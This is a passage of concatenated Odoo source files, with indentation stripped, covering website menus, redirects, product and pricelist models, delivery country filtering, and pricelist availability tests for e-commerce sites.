if to_delete:
self.browse(to_delete).unlink()
for menu in data['data']:
mid = menu['id']
# new menu are prefixed by new-
if isinstance(mid, pycompat.string_types):
new_menu = self.create({'name': menu['name'], 'website_id': website_id})
replace_id(mid, new_menu.id)
for menu in data['data']:
menu_id = self.browse(menu['id'])
# if the url match a website.page, set the m2o relation
# except if the menu url is '#', meaning it will be used as a menu container, most likely for a dropdown
if menu['url'] == '#':
if menu_id.page_id:
menu_id.page_id = None
else:
page = self.env['website.page'].search(self.env["website"].website_domain(website_id) + ['|', ('url', '=', menu['url']), ('url', '=', '/' + menu['url'])], limit=1)
if page:
menu['page_id'] = page.id
menu['url'] = page.url
elif menu_id.page_id:
menu_id.page_id.write({'url': menu['url']})
menu_id.write(menu)
return True
class WebsiteRedirect(models.Model):
_name = "website.redirect"
_description = "Website Redirect"
_order = "sequence, id"
_rec_name = 'url_from'
type = fields.Selection([('301', 'Moved permanently (301)'), ('302', 'Moved temporarily (302)')], string='Redirection Type', required=True, default='301')
url_from = fields.Char('Redirect From', required=True)
url_to = fields.Char('Redirect To', required=True)
website_id = fields.Many2one('website', 'Website', ondelete='cascade')
active = fields.Boolean(default=True)
sequence = fields.Integer()
```
#### File: website_rating/controllers/website_mail.py
```python
from odoo import http
from odoo.http import request
from odoo.addons.portal.controllers.mail import PortalChatter
class WebsiteRating(PortalChatter):
@http.route()
def portal_chatter_init(self, res_model, res_id, domain=False, limit=False, **kwargs):
result = super(WebsiteRating, self).portal_chatter_init(res_model, res_id, domain=domain, limit=limit, **kwargs)
# get the rating statistics about the record
if kwargs.get('rating_include'):
record = request.env[res_model].browse(res_id)
if hasattr(record, 'rating_get_stats'):
result['rating_stats'] = record.rating_get_stats([('website_published', '=', True)])
return result
@http.route()
def portal_message_fetch(self, res_model, res_id, domain=False, limit=False, offset=False, **kw):
# add 'rating_include' in context, to fetch them in portal_message_format
if kw.get('rating_include'):
context = dict(request.context)
context['rating_include'] = True
request.context = context
return super(WebsiteRating, self).portal_message_fetch(res_model, res_id, domain=domain, limit=limit, offset=offset, **kw)
```
#### File: website_sale_comparison/models/website_sale_comparison.py
```python
from collections import OrderedDict
from odoo import fields, models, _
class ProductAttributeCategory(models.Model):
_name = "product.attribute.category"
_description = "Product Attribute Category"
_order = 'sequence'
name = fields.Char("Category Name", required=True, translate=True)
sequence = fields.Integer("Sequence", default=10)
class ProductAttribute(models.Model):
_inherit = 'product.attribute'
category_id = fields.Many2one('product.attribute.category', string="Category",
help="Set a category to regroup similar attributes under "
"the same section in the Comparison page of eCommerce")
class ProductTemplate(models.Model):
_inherit = 'product.template'
def get_variant_groups(self):
res = OrderedDict()
for var in self._get_valid_product_template_attribute_lines():
res.setdefault(var.attribute_id.category_id.name or _('Uncategorized'), []).append(var)
return res
```
#### File: website_sale_delivery/models/res_country.py
```python
from odoo import fields, models
class ResCountry(models.Model):
_inherit = 'res.country'
def get_website_sale_countries(self, mode='billing'):
res = super(ResCountry, self).get_website_sale_countries(mode=mode)
if mode == 'shipping':
countries = self.env['res.country']
delivery_carriers = self.env['delivery.carrier'].sudo().search([('website_published', '=', True)])
for carrier in delivery_carriers:
if not carrier.country_ids and not carrier.state_ids:
countries = res
break
countries |= carrier.country_ids
res = res & countries
return res
def get_website_sale_states(self, mode='billing'):
res = super(ResCountry, self).get_website_sale_states(mode=mode)
states = self.env['res.country.state']
if mode == 'shipping':
dom = ['|', ('country_ids', 'in', self.id), ('country_ids', '=', False), ('website_published', '=', True)]
delivery_carriers = self.env['delivery.carrier'].sudo().search(dom)
for carrier in delivery_carriers:
if not carrier.country_ids and not carrier.state_ids:
states = res
break
states |= carrier.state_ids
if not states:
states = states.search([('country_id', '=', self.id)])
res = res & states
return res
```
#### File: website_sale_delivery/tests/test_ui.py
```python
import odoo.tests
# Part of Odoo. See LICENSE file for full copyright and licensing details.
@odoo.tests.tagged('post_install', '-at_install')
class TestUi(odoo.tests.HttpCase):
def test_01_free_delivery_when_exceed_threshold(self):
self.env.ref("delivery.free_delivery_carrier").write({
'fixed_price': 2,
'free_over': True,
'amount': 10,
})
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('check_free_delivery')", "odoo.__DEBUG__.services['web_tour.tour'].tours.check_free_delivery.ready", login="admin")
```
#### File: website_sale/models/product.py
```python
from odoo import api, fields, models, tools, _
from odoo.addons import decimal_precision as dp
from odoo.addons.website.models import ir_http
from odoo.tools.translate import html_translate
class ProductStyle(models.Model):
_name = "product.style"
_description = 'Product Style'
name = fields.Char(string='Style Name', required=True)
html_class = fields.Char(string='HTML Classes')
class ProductPricelist(models.Model):
_inherit = "product.pricelist"
def _default_website(self):
""" Find the first company's website, if there is one. """
company_id = self.env.user.company_id.id
domain = [('company_id', '=', company_id)]
return self.env['website'].search(domain, limit=1)
website_id = fields.Many2one('website', string="Website", ondelete='restrict', default=_default_website)
code = fields.Char(string='E-commerce Promotional Code', groups="base.group_user")
selectable = fields.Boolean(help="Allow the end user to choose this price list")
def clear_cache(self):
# website._get_pl_partner_order() is cached to avoid to recompute at each request the
# list of available pricelists. So, we need to invalidate the cache when
# we change the config of website price list to force to recompute.
website = self.env['website']
website._get_pl_partner_order.clear_cache(website)
@api.model
def create(self, data):
res = super(ProductPricelist, self).create(data)
self.clear_cache()
return res
@api.multi
def write(self, data):
res = super(ProductPricelist, self).write(data)
self.clear_cache()
return res
@api.multi
def unlink(self):
res = super(ProductPricelist, self).unlink()
self.clear_cache()
return res
def _get_partner_pricelist_multi_search_domain_hook(self):
domain = super(ProductPricelist, self)._get_partner_pricelist_multi_search_domain_hook()
website = ir_http.get_request_website()
if website:
domain += self._get_website_pricelists_domain(website.id)
return domain
def _get_partner_pricelist_multi_filter_hook(self):
res = super(ProductPricelist, self)._get_partner_pricelist_multi_filter_hook()
website = ir_http.get_request_website()
if website:
res = res.filtered(lambda pl: pl._is_available_on_website(website.id))
return res
@api.multi
def _is_available_on_website(self, website_id):
""" To be able to be used on a website, a pricelist should either:
- Have its `website_id` set to current website (specific pricelist).
- Have no `website_id` set and should be `selectable` (generic pricelist)
or should have a `code` (generic promotion).
Note: A pricelist without a website_id, not selectable and without a
code is a backend pricelist.
Change in this method should be reflected in `_get_website_pricelists_domain`.
"""
self.ensure_one()
return self.website_id.id == website_id or (not self.website_id and (self.selectable or self.sudo().code))
def _get_website_pricelists_domain(self, website_id):
''' Check above `_is_available_on_website` for explanation.
Change in this method should be reflected in `_is_available_on_website`.
'''
return [
'|', ('website_id', '=', website_id),
'&', ('website_id', '=', False),
'|', ('selectable', '=', True), ('code', '!=', False),
]
def _get_partner_pricelist_multi(self, partner_ids, company_id=None):
''' If `property_product_pricelist` is read from website, we should use
the website's company and not the user's one.
Passing a `company_id` to super will avoid using the current user's
company.
'''
website = ir_http.get_request_website()
if not company_id and website:
company_id = website.company_id.id
return super(ProductPricelist, self)._get_partner_pricelist_multi(partner_ids, company_id)
class ProductPublicCategory(models.Model):
_name = "product.public.category"
_inherit = ["website.seo.metadata", "website.multi.mixin"]
_description = "Website Product Category"
_order = "sequence, name"
name = fields.Char(required=True, translate=True)
parent_id = fields.Many2one('product.public.category', string='Parent Category', index=True)
child_id = fields.One2many('product.public.category', 'parent_id', string='Children Categories')
sequence = fields.Integer(help="Gives the sequence order when displaying a list of product categories.")
# NOTE: there is no 'default image', because by default we don't show
# thumbnails for categories. However if we have a thumbnail for at least one
# category, then we display a default image on the other, so that the
# buttons have consistent styling.
# In this case, the default image is set by the js code.
image = fields.Binary(attachment=True, help="This field holds the image used as image for the category, limited to 1024x1024px.")
image_medium = fields.Binary(string='Medium-sized image', attachment=True,
help="Medium-sized image of the category. It is automatically "
"resized as a 128x128px image, with aspect ratio preserved. "
"Use this field in form views or some kanban views.")
image_small = fields.Binary(string='Small-sized image', attachment=True,
help="Small-sized image of the category. It is automatically "
"resized as a 64x64px image, with aspect ratio preserved. "
"Use this field anywhere a small image is required.")
@api.model
def create(self, vals):
tools.image_resize_images(vals)
return super(ProductPublicCategory, self).create(vals)
@api.multi
def write(self, vals):
tools.image_resize_images(vals)
return super(ProductPublicCategory, self).write(vals)
@api.constrains('parent_id')
def check_parent_id(self):
if not self._check_recursion():
raise ValueError(_('Error ! You cannot create recursive categories.'))
@api.multi
def name_get(self):
res = []
for category in self:
names = [category.name]
parent_category = category.parent_id
while parent_category:
names.append(parent_category.name)
parent_category = parent_category.parent_id
res.append((category.id, ' / '.join(reversed(names))))
return res
class ProductTemplate(models.Model):
_inherit = ["product.template", "website.seo.metadata", 'website.published.multi.mixin', 'rating.mixin']
_name = 'product.template'
_mail_post_access = 'read'
website_description = fields.Html('Description for the website', sanitize_attributes=False, translate=html_translate)
alternative_product_ids = fields.Many2many('product.template', 'product_alternative_rel', 'src_id', 'dest_id',
string='Alternative Products', help='Suggest alternatives to your customer'
'(upsell strategy).Those product show up on the product page.')
accessory_product_ids = fields.Many2many('product.product', 'product_accessory_rel', 'src_id', 'dest_id',
string='Accessory Products', help='Accessories show up when the customer'
'reviews the cart before payment (cross-sell strategy).')
website_size_x = fields.Integer('Size X', default=1)
website_size_y = fields.Integer('Size Y', default=1)
website_style_ids = fields.Many2many('product.style', string='Styles')
website_sequence = fields.Integer('Website Sequence', help="Determine the display order in the Website E-commerce",
default=lambda self: self._default_website_sequence())
public_categ_ids = fields.Many2many('product.public.category', string='Website Product Category',
help="The product will be available in each mentioned e-commerce category. Go to"
"Shop > Customize and enable 'E-commerce categories' to view all e-commerce categories.")
product_image_ids = fields.One2many('product.image', 'product_tmpl_id', string='Images')
# website_price deprecated, directly use _get_combination_info instead
website_price = fields.Float('Website price', compute='_website_price', digits=dp.get_precision('Product Price'))
# website_public_price deprecated, directly use _get_combination_info instead
website_public_price = fields.Float('Website public price', compute='_website_price', digits=dp.get_precision('Product Price'))
# website_price_difference deprecated, directly use _get_combination_info instead
website_price_difference = fields.Boolean('Website price difference', compute='_website_price')
def _website_price(self):
current_website = self.env['website'].get_current_website()
for template in self.with_context(website_id=current_website.id):
res = template._get_combination_info()
template.website_price = res.get('price')
template.website_public_price = res.get('list_price')
template.website_price_difference = res.get('has_discounted_price')
@api.multi
def _has_no_variant_attributes(self):
"""Return whether this `product.template` has at least one no_variant
attribute.
:return: True if at least one no_variant attribute, False otherwise
:rtype: bool
"""
self.ensure_one()
return any(a.create_variant == 'no_variant' for a in self._get_valid_product_attributes())
@api.multi
def _has_is_custom_values(self):
self.ensure_one()
"""Return whether this `product.template` has at least one is_custom
attribute value.
:return: True if at least one is_custom attribute value, False otherwise
:rtype: bool
"""
return any(v.is_custom for v in self._get_valid_product_attribute_values())
@api.multi
def _is_quick_add_to_cart_possible(self, parent_combination=None):
"""
It's possible to quickly add to cart if there's no optional product,
there's only one possible combination and no value is set to is_custom.
Attributes set to dynamic or no_variant don't have to be tested
specifically because they will be taken into account when checking for
the possible combinations.
:param parent_combination: combination from which `self` is an
optional or accessory product
:type parent_combination: recordset `product.template.attribute.value`
:return: True if it's possible to quickly add to cart, else False
:rtype: bool
"""
self.ensure_one()
if not self._is_add_to_cart_possible(parent_combination):
return False
gen = self._get_possible_combinations(parent_combination)
first_possible_combination = next(gen)
if next(gen, False) is not False:
# there are at least 2 possible combinations.
return False
if self._has_is_custom_values():
return False
if self.optional_product_ids.filtered(lambda p: p._is_add_to_cart_possible(first_possible_combination)):
return False
return True
@api.multi
def _get_possible_variants_sorted(self, parent_combination=None):
"""Return the sorted recordset of variants that are possible.
The order is based on the order of the attributes and their values.
See `_get_possible_variants` for the limitations of this method with
dynamic or no_variant attributes, and also for a warning about
performances.
:param parent_combination: combination from which `self` is an
optional or accessory product
:type parent_combination: recordset `product.template.attribute.value`
:return: the sorted variants that are possible
:rtype: recordset of `product.product`
"""
self.ensure_one()
def _sort_key_attribute_value(value):
# if you change this order, keep it in sync with _order from `product.attribute`
return (value.attribute_id.sequence, value.attribute_id.id)
def _sort_key_variant(variant):
"""
We assume all variants will have the same attributes, with only one value for each.
- first level sort: same as "product.attribute"._order
- second level sort: same as "product.attribute.value"._order
"""
keys = []
for attribute in variant.attribute_value_ids.sorted(_sort_key_attribute_value):
# if you change this order, keep it in sync with _order from `product.attribute.value`
keys.append(attribute.sequence)
keys.append(attribute.id)
return keys
return self._get_possible_variants(parent_combination).sorted(_sort_key_variant)
@api.multi
def _get_combination_info(self, combination=False, product_id=False, add_qty=1, pricelist=False, parent_combination=False, only_template=False):
"""Override for website, where we want to:
- take the website pricelist if no pricelist is set
- apply the b2b/b2c setting to the result
This will work when adding website_id to the context, which is done
automatically when called from routes with website=True.
"""
self.ensure_one()
current_website = False
if self.env.context.get('website_id'):
current_website = self.env['website'].get_current_website()
if not pricelist:
pricelist = current_website.get_current_pricelist()
combination_info = super(ProductTemplate, self)._get_combination_info(
combination=combination, product_id=product_id, add_qty=add_qty, pricelist=pricelist,
parent_combination=parent_combination, only_template=only_template)
if self.env.context.get('website_id'):
partner = self.env.user.partner_id
company_id = current_website.company_id
product = self.env['product.product'].browse(combination_info['product_id']) or self
tax_display = self.env.user.has_group('account.group_show_line_subtotals_tax_excluded') and 'total_excluded' or 'total_included'
taxes = partner.property_account_position_id.map_tax(product.sudo().taxes_id.filtered(lambda x: x.company_id == company_id), product, partner)
# The list_price is always the price of one.
quantity_1 = 1
price = taxes.compute_all(combination_info['price'], pricelist.currency_id, quantity_1, product, partner)[tax_display]
if pricelist.discount_policy == 'without_discount':
list_price = taxes.compute_all(combination_info['list_price'], pricelist.currency_id, quantity_1, product, partner)[tax_display]
else:
list_price = price
has_discounted_price = pricelist.currency_id.compare_amounts(list_price, price) == 1
combination_info.update(
price=price,
list_price=list_price,
has_discounted_price=has_discounted_price,
)
return combination_info
@api.multi
def _create_first_product_variant(self, log_warning=False):
"""Create if necessary and possible and return the first product
variant for this template.
:param log_warning: whether a warning should be logged on fail
:type log_warning: bool
:return: the first product variant or none
:rtype: recordset of `product.product`
"""
return self._create_product_variant(self._get_first_possible_combination(), log_warning)
@api.multi
def _get_current_company_fallback(self, **kwargs):
"""Override: if a website is set on the product or given, fallback to
the company of the website. Otherwise use the one from parent method."""
res = super(ProductTemplate, self)._get_current_company_fallback(**kwargs)
website = self.website_id or kwargs.get('website')
return website and website.company_id or res
def _default_website_sequence(self):
self._cr.execute("SELECT MIN(website_sequence) FROM %s" % self._table)
min_sequence = self._cr.fetchone()[0]
return min_sequence and min_sequence - 1 or 10
def set_sequence_top(self):
self.website_sequence = self.sudo().search([], order='website_sequence desc', limit=1).website_sequence + 1
def set_sequence_bottom(self):
self.website_sequence = self.sudo().search([], order='website_sequence', limit=1).website_sequence - 1
def set_sequence_up(self):
previous_product_tmpl = self.sudo().search(
[('website_sequence', '>', self.website_sequence), ('website_published', '=', self.website_published)],
order='website_sequence', limit=1)
if previous_product_tmpl:
previous_product_tmpl.website_sequence, self.website_sequence = self.website_sequence, previous_product_tmpl.website_sequence
else:
self.set_sequence_top()
def set_sequence_down(self):
next_prodcut_tmpl = self.search([('website_sequence', '<', self.website_sequence), ('website_published', '=', self.website_published)], order='website_sequence desc', limit=1)
if next_prodcut_tmpl:
next_prodcut_tmpl.website_sequence, self.website_sequence = self.website_sequence, next_prodcut_tmpl.website_sequence
else:
return self.set_sequence_bottom()
def _default_website_meta(self):
res = super(ProductTemplate, self)._default_website_meta()
res['default_opengraph']['og:description'] = res['default_twitter']['twitter:description'] = self.description_sale
res['default_opengraph']['og:title'] = res['default_twitter']['twitter:title'] = self.name
res['default_opengraph']['og:image'] = res['default_twitter']['twitter:image'] = "/web/image/product.template/%s/image" % (self.id)
return res
@api.multi
def _compute_website_url(self):
super(ProductTemplate, self)._compute_website_url()
for product in self:
product.website_url = "/shop/product/%s" % (product.id,)
class Product(models.Model):
_inherit = "product.product"
website_id = fields.Many2one(related='product_tmpl_id.website_id', readonly=False)
# website_price deprecated, directly use _get_combination_info instead
website_price = fields.Float('Website price', compute='_website_price', digits=dp.get_precision('Product Price'))
# website_public_price deprecated, directly use _get_combination_info instead
website_public_price = fields.Float('Website public price', compute='_website_price', digits=dp.get_precision('Product Price'))
# website_price_difference deprecated, directly use _get_combination_info instead
website_price_difference = fields.Boolean('Website price difference', compute='_website_price')
def _website_price(self):
for product in self:
res = product._get_combination_info_variant()
product.website_price = res.get('price')
product.website_public_price = res.get('list_price')
product.website_price_difference = res.get('has_discounted_price')
@api.multi
def website_publish_button(self):
self.ensure_one()
return self.product_tmpl_id.website_publish_button()
class ProductImage(models.Model):
_name = 'product.image'
_description = 'Product Image'
name = fields.Char('Name')
image = fields.Binary('Image', attachment=True)
product_tmpl_id = fields.Many2one('product.template', 'Related Product', copy=True)
```
#### File: website_sale_stock/models/res_config_settings.py
```python
from odoo import fields, models, api
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
inventory_availability = fields.Selection([
('never', 'Sell regardless of inventory'),
('always', 'Show inventory on website and prevent sales if not enough stock'),
('threshold', 'Show inventory below a threshold and prevent sales if not enough stock'),
('custom', 'Show product-specific notifications'),
], string='Inventory Availability', default='never')
available_threshold = fields.Float(string='Availability Threshold')
@api.multi
def set_values(self):
super(ResConfigSettings, self).set_values()
IrDefault = self.env['ir.default'].sudo()
IrDefault.set('product.template', 'inventory_availability', self.inventory_availability)
IrDefault.set('product.template', 'available_threshold', self.available_threshold if self.inventory_availability == 'threshold' else None)
@api.model
def get_values(self):
res = super(ResConfigSettings, self).get_values()
IrDefault = self.env['ir.default'].sudo()
res.update(inventory_availability=IrDefault.get('product.template', 'inventory_availability') or 'never',
available_threshold=IrDefault.get('product.template', 'available_threshold') or 5.0)
return res
```
#### File: website_sale/tests/test_website_sale_pricelist.py
```python
try:
from unittest.mock import patch
except ImportError:
from mock import patch
from odoo.tests.common import HttpCase, TransactionCase
from odoo.tools import DotDict
''' /!\/!\
Calling `get_pricelist_available` after setting `property_product_pricelist` on
a partner will not work as expected. That field will change the output of
`get_pricelist_available` but modifying it will not invalidate the cache.
Thus, tests should not do:
self.env.user.partner_id.property_product_pricelist = my_pricelist
pls = self.get_pricelist_available()
self.assertEqual(...)
self.env.user.partner_id.property_product_pricelist = another_pricelist
pls = self.get_pricelist_available()
self.assertEqual(...)
as `_get_pl_partner_order` cache won't be invalidate between the calls, output
won't be the one expected and tests will actually not test anything.
Try to keep one call to `get_pricelist_available` by test method.
'''
class TestWebsitePriceList(TransactionCase):
# Mock nedded because request.session doesn't exist during test
def _get_pricelist_available(self, show_visible=False):
return self.get_pl(self.args.get('show'), self.args.get('current_pl'), self.args.get('country'))
def setUp(self):
super(TestWebsitePriceList, self).setUp()
self.env.user.partner_id.country_id = False # Remove country to avoid property pricelist computed.
self.website = self.env['website'].browse(1)
self.website.user_id = self.env.user
self.env['product.pricelist'].search([]).write({'website_id': False})
website_pls = ('list_benelux', 'list_christmas', 'list_europe')
for pl in website_pls:
self.env.ref('website_sale.' + pl).website_id = self.website.id
self.env.ref('product.list0').website_id = self.website.id
self.env.ref('website_sale.list_benelux').selectable = True
self.website.pricelist_id = self.ref('product.list0')
ca_group = self.env['res.country.group'].create({
'name': 'Canada',
'country_ids': [(6, 0, [self.ref('base.ca')])]
})
self.env['product.pricelist'].create({
'name': 'Canada',
'selectable': True,
'website_id': self.website.id,
'country_group_ids': [(6, 0, [ca_group.id])],
'sequence': 10
})
self.args = {
'show': False,
'current_pl': False,
}
patcher = patch('odoo.addons.website_sale.models.website.Website.get_pricelist_available', wraps=self._get_pricelist_available)
patcher.start()
self.addCleanup(patcher.stop)
def get_pl(self, show, current_pl, country):
pl_ids = self.website._get_pl_partner_order(
country,
show,
self.website.pricelist_id.id,
current_pl,
self.website.pricelist_ids
)
return self.env['product.pricelist'].browse(pl_ids)
def test_get_pricelist_available_show(self):
show = True
current_pl = False
country_list = {
False: ['Public Pricelist', 'EUR', 'Benelux', 'Canada'],
'BE': ['EUR', 'Benelux'],
'IT': ['EUR'],
'CA': ['Canada'],
'US': ['Public Pricelist', 'EUR', 'Benelux', 'Canada']
}
for country, result in country_list.items():
pls = self.get_pl(show, current_pl, country)
self.assertEquals(len(set(pls.mapped('name')) & set(result)), len(pls), 'Test failed for %s (%s %s vs %s %s)'
% (country, len(pls), pls.mapped('name'), len(result), result))
def test_get_pricelist_available_not_show(self):
show = False
current_pl = False
country_list = {
False: ['Public Pricelist', 'EUR', 'Benelux', 'Christmas', 'Canada'],
'BE': ['EUR', 'Benelux', 'Christmas'],
'IT': ['EUR', 'Christmas'],
'US': ['Public Pricelist', 'EUR', 'Benelux', 'Christmas', 'Canada'],
'CA': ['Canada']
}
for country, result in country_list.items():
pls = self.get_pl(show, current_pl, country)
self.assertEquals(len(set(pls.mapped('name')) & set(result)), len(pls), 'Test failed for %s (%s %s vs %s %s)'
% (country, len(pls), pls.mapped('name'), len(result), result))
def test_get_pricelist_available_promocode(self):
christmas_pl = self.ref('website_sale.list_christmas')
country_list = {
False: True,
'BE': True,
'IT': True,
'US': True,
'CA': False
}
for country, result in country_list.items():
self.args['country'] = country
# mock patch method could not pass env context
available = self.website.is_pricelist_available(christmas_pl)
if result:
self.assertTrue(available, 'AssertTrue failed for %s' % country)
else:
self.assertFalse(available, 'AssertFalse failed for %s' % country)
def test_get_pricelist_available_show_with_auto_property(self):
show = True
self.env.user.partner_id.country_id = self.env.ref('base.be') # Add EUR pricelist auto
current_pl = False
country_list = {
False: ['Public Pricelist', 'EUR', 'Benelux', 'Canada'],
'BE': ['EUR', 'Benelux'],
'IT': ['EUR'],
'CA': ['EUR', 'Canada'],
'US': ['Public Pricelist', 'EUR', 'Benelux', 'Canada']
}
for country, result in country_list.items():
pls = self.get_pl(show, current_pl, country)
self.assertEquals(len(set(pls.mapped('name')) & set(result)), len(pls), 'Test failed for %s (%s %s vs %s %s)'
% (country, len(pls), pls.mapped('name'), len(result), result))
def simulate_frontend_context(self, website_id=1):
# Mock this method will be enough to simulate frontend context in most methods
def get_request_website():
return self.env['website'].browse(website_id)
patcher = patch('odoo.addons.website.models.ir_http.get_request_website', wraps=get_request_website)
patcher.start()
self.addCleanup(patcher.stop)
class TestWebsitePriceListAvailable(TransactionCase):
# This is enough to avoid a mock (request.session/website do not exist during test)
def get_pricelist_available(self, show_visible=False, website_id=1, country_code=None, website_sale_current_pl=None):
request = DotDict({
'website': self.env['website'].browse(website_id),
'session': {
'geoip': {
'country_code': country_code,
},
'website_sale_current_pl': website_sale_current_pl,
},
})
return self.env['website']._get_pricelist_available(request, show_visible)
def setUp(self):
super(TestWebsitePriceListAvailable, self).setUp()
Pricelist = self.env['product.pricelist']
Website = self.env['website']
# Set up 2 websites
self.website = Website.browse(1)
self.website2 = Website.create({'name': 'Website 2'})
# Remove existing pricelists and create new ones
Pricelist.search([]).write({'active': False})
self.backend_pl = Pricelist.create({
'name': 'Backend Pricelist',
'website_id': False,
})
self.generic_pl_select = Pricelist.create({
'name': 'Generic Selectable Pricelist',
'selectable': True,
'website_id': False,
})
self.generic_pl_code = Pricelist.create({
'name': 'Generic Code Pricelist',
'code': 'GENERICCODE',
'website_id': False,
})
self.generic_pl_code_select = Pricelist.create({
'name': 'Generic Code Selectable Pricelist',
'code': 'GENERICCODESELECT',
'selectable': True,
'website_id': False,
})
self.w1_pl = Pricelist.create({
'name': 'Website 1 Pricelist',
'website_id': self.website.id,
})
self.w1_pl_select = Pricelist.create({
'name': 'Website 1 Pricelist Selectable',
'website_id': self.website.id,
'selectable': True,
})
self.w1_pl_code = Pricelist.create({
'name': 'Website 1 Pricelist Code',
'website_id': self.website.id,
'code': 'W1CODE',
})
self.w1_pl_code_select = Pricelist.create({
'name': 'Website 1 Pricelist Code Selectable',
'website_id': self.website.id,
'code': 'W1CODESELECT',
'selectable': True,
})
self.w2_pl = Pricelist.create({
'name': 'Website 2 Pricelist',
'website_id': self.website2.id,
})
simulate_frontend_context(self)
def test_get_pricelist_available(self):
# all_pl = self.backend_pl + self.generic_pl_select + self.generic_pl_code + self.generic_pl_code_select + self.w1_pl + self.w1_pl_select + self.w1_pl_code + self.w1_pl_code_select + self.w2_pl
# Test get all available pricelists
pls_to_return = self.generic_pl_select + self.generic_pl_code + self.generic_pl_code_select + self.w1_pl + self.w1_pl_select + self.w1_pl_code + self.w1_pl_code_select
pls = self.get_pricelist_available()
self.assertEqual(pls, pls_to_return, "Every pricelist having the correct website_id set or (no website_id but a code or selectable) should be returned")
# Test get all available and visible pricelists
pls_to_return = self.generic_pl_select + self.generic_pl_code_select + self.w1_pl_select + self.w1_pl_code_select
pls = self.get_pricelist_available(show_visible=True)
self.assertEqual(pls, pls_to_return, "Only selectable pricelists website compliant (website_id False or current website) should be returned")
def test_property_product_pricelist_for_inactive_partner(self):
# `_get_partner_pricelist_multi` should consider inactive users when searching for pricelists.
# Real case if for public user. His `property_product_pricelist` need to be set as it is passed
# through `_get_pl_partner_order` as the `website_pl` when searching for available pricelists
# for active users.
public_partner = self.env.ref('base.public_partner')
self.assertFalse(public_partner.active, "Ensure public partner is inactive (purpose of this test)")
pl = public_partner.property_product_pricelist
self.assertEqual(len(pl), 1, "Inactive partner should still get a `property_product_pricelist`")
class TestWebsitePriceListAvailableGeoIP(TestWebsitePriceListAvailable):
def setUp(self):
super(TestWebsitePriceListAvailableGeoIP, self).setUp()
# clean `property_product_pricelist` for partner for this test (clean setup)
self.env['ir.property'].search([('res_id', '=', 'res.partner,%s' % self.env.user.partner_id.id)]).unlink()
# set different country groups on pricelists
c_EUR = self.env.ref('base.europe')
c_BENELUX = self.env.ref('website_sale.benelux')
self.BE = self.env.ref('base.be')
NL = self.env.ref('base.nl')
c_BE = self.env['res.country.group'].create({'name': 'Belgium', 'country_ids': [(6, 0, [self.BE.id])]})
c_NL = self.env['res.country.group'].create({'name': 'Netherlands', 'country_ids': [(6, 0, [NL.id])]})
(self.backend_pl + self.generic_pl_select + self.generic_pl_code + self.w1_pl_select).write({'country_group_ids': [(6, 0, [c_BE.id])]})
(self.generic_pl_code_select + self.w1_pl + self.w2_pl).write({'country_group_ids': [(6, 0, [c_BENELUX.id])]})
(self.w1_pl_code).write({'country_group_ids': [(6, 0, [c_EUR.id])]})
(self.w1_pl_code_select).write({'country_group_ids': [(6, 0, [c_NL.id])]})
# pricelist | selectable | website | code | country group |
# ----------------------------------------------------------------------|
# backend_pl | | | | BE |
# generic_pl_select | V | | | BE |
# generic_pl_code | | | V | BE |
# generic_pl_code_select | V | | V | BENELUX |
# w1_pl | | 1 | | BENELUX |
# w1_pl_select | V | 1 | | BE |
# w1_pl_code | | 1 | V | EUR |
# w1_pl_code_select | V | 1 | V | NL |
# w2_pl | | 2 | | BENELUX |
# available pl for website 1 for GeoIP BE (anything except website 2, backend and NL)
self.website1_be_pl = self.generic_pl_select + self.generic_pl_code + self.w1_pl_select + self.generic_pl_code_select + self.w1_pl + self.w1_pl_code
def test_get_pricelist_available_geoip(self):
# Test get all available pricelists with geoip and no partner pricelist (ir.property)
# property_product_pricelist will also be returned in the available pricelists
self.website1_be_pl += self.env.user.partner_id.property_product_pricelist
pls = self.get_pricelist_available(country_code=self.BE.code)
self.assertEqual(pls, self.website1_be_pl, "Only pricelists for BE and accessible on website should be returned, and the partner pl")
def test_get_pricelist_available_geoip2(self):
# Test get all available pricelists with geoip and a partner pricelist (ir.property) not website compliant
self.env.user.partner_id.property_product_pricelist = self.backend_pl
pls = self.get_pricelist_available(country_code=self.BE.code)
self.assertEqual(pls, self.website1_be_pl, "Only pricelists for BE and accessible on website should be returned as partner pl is not website compliant")
def test_get_pricelist_available_geoip3(self):
# Test get all available pricelists with geoip and a partner pricelist (ir.property) website compliant (but not geoip compliant)
self.env.user.partner_id.property_product_pricelist = self.w1_pl_code_select
self.website1_be_pl += self.env.user.partner_id.property_product_pricelist
pls = self.get_pricelist_available(country_code=self.BE.code)
self.assertEqual(pls, self.website1_be_pl, "Only pricelists for BE and accessible on website should be returned, plus the partner pricelist as it is website compliant")
def test_get_pricelist_available_geoip4(self):
# Test get all available with geoip and visible pricelists + promo pl
pls_to_return = self.generic_pl_select + self.w1_pl_select + self.generic_pl_code_select
# property_product_pricelist will also be returned in the available pricelists
pls_to_return += self.env.user.partner_id.property_product_pricelist
current_pl = self.w1_pl_code
pls = self.get_pricelist_available(country_code=self.BE.code, show_visible=True, website_sale_current_pl=current_pl.id)
self.assertEqual(pls, pls_to_return + current_pl, "Only pricelists for BE, accessible en website and selectable should be returned. It should also return the applied promo pl")
class TestWebsitePriceListHttp(HttpCase):
def test_get_pricelist_available_multi_company(self):
''' Test that the `property_product_pricelist` of `res.partner` is not
computed as SUPERUSER_ID.
Indeed, `property_product_pricelist` is a _compute that ends up
doing a search on `product.pricelist` that woule bypass the
pricelist multi-company `ir.rule`. Then it would return pricelists
from another company and the code would raise an access error when
reading that `property_product_pricelist`.
'''
test_company = self.env['res.company'].create({'name': 'Test Company'})
self.env['product.pricelist'].create({
'name': 'Backend Pricelist For "Test Company"',
'website_id': False,
'company_id': test_company.id,
'sequence': 1,
})
self.authenticate('portal', 'portal')
r = self.url_open('/shop')
self.assertEqual(r.status_code, 200, "The page should not raise an access error because of reading pricelists from other companies")
class TestWebsitePriceListMultiCompany(TransactionCase):
def setUp(self):
''' Create a basic multi-company pricelist environment:
- Set up 2 companies with their own company-restricted pricelist each.
- Add demo user in those 2 companies
- For each company, add that company pricelist to the demo user partner.
- Set website's company to company 2
- Demo user will still be in company 1
'''
super(TestWebsitePriceListMultiCompany, self).setUp()
self.demo_user = self.env.ref('base.user_demo')
# Create and add demo user to 2 companies
self.company1 = self.demo_user.company_id
self.company2 = self.env['res.company'].create({'name': 'Test Company'})
self.demo_user.company_ids += self.company2
# Set company2 as current company for demo user
self.website = self.env['website'].browse(1)
self.website.company_id = self.company2
# Create a company pricelist for each company and set it to demo user
